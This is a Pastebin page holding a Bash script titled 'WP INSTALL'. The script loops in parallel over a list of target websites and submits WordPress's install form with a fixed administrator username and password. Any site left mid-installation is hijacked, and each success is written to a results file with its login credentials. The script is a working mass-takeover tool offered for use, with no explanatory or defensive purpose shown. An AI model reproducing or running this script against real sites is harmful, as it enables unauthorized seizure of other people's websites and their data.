Advertisement
LittleJok3r

WP INSTALL

Feb 22nd, 2019
798
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.86 KB | None | 0 0
  1. #!/bin/bash
  2. #LittleJok3r ~ @D3pTeam
  3. #update
  4. cyan='\033[0;36m'
  5. green='\e[92m'
  6. red='\033[0;31m'
  7. limit=20
  8.    sed -i 's/\r//' $0
  9. gass(){
  10.       if [[ $(curl --silent -d "weblog_title=Killer&user_name=joker1337&admin_password=KillerQ1337&admin_password2=KillerQ1337&admin_email=$email" --url "$site/wp-admin/install.php?step=2") =~ '<h1>Success!</h1>' ]];
  11.       then
  12.       printf "$green[+] Sukses Install!\n"
  13.       echo "$site/wp-login.php" | tee -a result_wp.txt
  14.       echo "Username = joker1337" | tee -a result_wp.txt
  15.       echo "Password = KillerQ1337" | tee -a result_wp.txt
  16.       else
  17.       printf "$red[-] $site Failed or not vuln\n"
  18.       fi
  19.      }
  20. read -p "List Target : " list
  21. read -p "Email Mu : " email
  22. for site in `cat $list`; do
  23.    ((cthread=cthread%limit)); ((cthread++==0)) && wait
  24.                 gass $site &
  25.             done
  26.             wait
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement